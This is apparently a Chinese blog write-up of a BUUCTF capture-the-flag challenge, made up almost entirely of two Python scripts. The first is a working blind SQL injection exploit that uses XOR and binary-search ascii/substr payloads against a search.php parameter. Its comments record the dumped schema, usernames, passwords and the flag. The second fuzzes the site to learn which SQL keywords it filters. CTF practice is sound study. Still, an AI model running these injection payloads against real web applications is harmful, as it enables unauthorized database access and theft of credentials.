本文章没有找到对应的语言版本

发现新版本

网站好像有新内容,是否更新(゚⊿゚)ツ?

CTF-GREAT

思路

带点过滤的sql盲注,脚本一把梭

import requests

url="http://79e4ba64-19bf-4394-a0d4-c3d4d8bcb203.node5.buuoj.cn:81/search.php"
select="select(database())"#geek
select="select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())"#F1naI1y,Flaaaaag
select="select(group_concat(column_name))from(information_schema.columns)where(table_name='Flaaaaag')"#id,fl4gawsl
select="select(group_concat(id,fl4gawsl))from(Flaaaaag)"#1NO!
select="select(group_concat(column_name))from(information_schema.columns)where(table_name='F1naI1y')"#id,username,password
select="select(group_concat(id,username,password))from(F1naI1y)"#1mygodcl4y_is_really_amazing,2welcomewelcome_to_my_blog,3sitehttp://www.cl4y.top,4sitehttp://www.cl4y.top,5sitehttp://www.cl4y.top,6sitehttp://www.cl4y.top,7Sycwelcom_to_Syclover,8finallycl4y_really_need_a_grilfriend,9flagflag{5bb6ba67-d838-407c-9c1c-de45fa11a7a3}
result=""

for i in range(1,1000):
    left=32
    right=127
    mid=(left+right)//2
    while(left<right):
        payload={"id":f"1^(ascii(substr(({select}),{i},1))>{mid})"}
        r=requests.get(url,params=payload)
        # print(r.request.url)
        # exit(0)
        if "ERROR!!!" in r.text:
            left=mid+1
        else:
            right=mid
        mid=(left+right)//2
    result+=chr(left)
    print(result)
    if(mid==32 or mid==126):
        print("注入完成,结果为:\n[::]",result)
        exit(0)

找到一个有用的脚本

import requests
import time
# 打开读取SQL_fuzz文件
with open("SQL_fuzz.txt", "r") as f:
    contents = f.readlines()
    # print(contents)
# 删除读取数据中的'\n'
data_list = []
for msg in contents:
    msg = msg.strip('\n')
    # # 字符串根据空格进行分割
    # d = msg.split(' ')
    data_list.append(msg)
f.close
# print(data_list)

# 进行fuzz注入
url = "http://3f8893c2-6eda-4113-bcfa-2b6188684bd7.node4.buuoj.cn:81/search.php?id="
# GET请求
for data in data_list:
    r = requests.get(url+data)
    # 使用time使请求能够拥有足够的时间去响应
    time.sleep(0.04)
    # 获取过滤网站响应信息
    reponse_txt = "臭弟弟"
    if (reponse_txt in r.text):
        print("该网站过滤了{}".format(data))

# POST请求
# for d in data_list:
#     payload = {
#         "": d
#     }
#     r = requests.post(url=url, data=payload)
#     reponse_txt = "臭弟弟"
#     if (reponse_txt in r.text):
#         print("该网站过滤了{}".format(data))

说些什么吧!

giscus